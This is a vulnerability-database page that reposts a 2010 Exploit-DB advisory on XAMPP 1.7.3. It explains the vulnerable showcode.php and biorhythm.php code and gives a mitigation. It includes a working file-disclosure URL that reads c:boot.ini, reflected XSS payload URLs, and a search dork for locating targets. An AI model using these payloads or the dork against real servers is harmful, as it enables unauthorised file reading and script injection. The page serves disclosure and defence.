XAMPP - exploit.company

vendor:

XAMPP

by:

TheLeader

7,5

CVSS

HIGH

File Disclosure & Cross Site Scripting

CWE

Product Name: XAMPP

Affected Version From: 1.7.3

Affected Version To: 1.7.3

Patch Exists: YES

Related CWE: N/A

CPE: a:apache:xampp

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP Hebrew, Service Pack 3

2010

XAMPP <= 1.7.3 multiple vulnerabilites

XAMPP is vulnerable to a remote file disclosure attack. The vulnerability exists within the web application supplied with XAMPP. showcode.php relies on basename($_SERVER['PHP_SELF']) to retrieve the path. What $_SERVER['PHP_SELF'] actually does is retrieve is the path of the requested file. basename() parses the last element of that path using "/" as a delimiter. Traveling through the directory tree, though, requires the "/" character that is used by basename() as a delimiter. Therefor directory traveling it is not achieved but it is possible to view file contents from any drive, and the XAMPP htdocs directory. XAMPP is also vulnerable to a Cross Site Scripting attack. The vulnerability exists within the web application supplied with XAMPP. The vulnerability is caused due to the application not properly sanitizing user-supplied input. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to generate unexpected results. Sanitize user input to prevent Cross Site Scripting attacks.

Source

Exploit-DB raw data:

#     _             ____  __            __    ___ 
#    (_)____ _   __/ __ \/ /_____  ____/ /  _/_/ |
#   / // __ \ | / / / / / //_/ _ \/ __  /  / / / /
#  / // / / / |/ / /_/ / ,< /  __/ /_/ /  / / / / 
# /_//_/ /_/|___/\____/_/|_|\___/\__,_/  / /_/_/  
#                   Live by the byte     |_/_/  
#
# Members:
#
# Pr0T3cT10n
# -=M.o.B.=-
# TheLeader
# Sro
# Debug
#
# Contact: inv0ked.israel@gmail.com
#
# -----------------------------------
#
# Exploit Title: XAMPP <= 1.7.3 multiple vulnerabilites
# Date: 31/10/2010
# Author: TheLeader
# Software Link: http://www.apachefriends.org/en/xampp-windows.html
# Affected Version: 1.7.3 and prior
# Tested on Windows XP Hebrew, Service Pack 3
# ISRAEL, NULLBYTE.ORG.IL
#
# -----------------------------------
 
I. File disclosure

XAMPP is vulnerable to a remote file disclosure attack.
The vulnerability exists within the web application supplied with XAMPP.

http://[host]/xampp/showcode.php/c:boot.ini?showcode=1

showcode.php:
<?php
   echo '<br><br>';
   if ($_REQUEST['showcode'] != 1) {
   echo '<a href="'.$_SERVER['PHP_SELF'].'?showcode=1">'.$TEXT['global-showcode'].'</a>';
   } else {
       $file = file_get_contents(basename($_SERVER['PHP_SELF']));
       echo "<h2>".$TEXT['global-sourcecode']."</h2>";
       echo "<textarea cols='100' rows='10'>";
       echo htmlspecialchars($file);
       echo "</textarea>";
   }
?>

showcode.php relies on basename($_SERVER['PHP_SELF']) to retrieve the path.
What $_SERVER['PHP_SELF'] actually does is retrieve is the path of the requested file.
basename() parses the last element of that path using "/" as a delimiter.

Traveling through the directory tree, though, requires the "/" character that is used by basename() as a delimiter.
Therefor directory traveling it is not achieved but it is possible to view file contents from any drive, and the XAMPP htdocs directory.

II. Cross Site Scripting

http://[host]/xampp/phonebook.php/"><script>alert("XSS")</script>
http://[host]/xampp/biorhythm.php/"><script>alert("XSS")</script>

It is interesting to see the same programming error lead to another security vulnerability.
Some PHP scripts in the XAMPP dir rely on $_SERVER['PHP_SELF'] for retrieving the "action" tag for HTML forms.
This can be exploited to perform Cross Site Scripting attacks.

biorhythm.php (line 75):
<form method="post" action="<?php echo basename($_SERVER['PHP_SELF']); ?>">

dork: "inurl:xampp/biorhythm.php"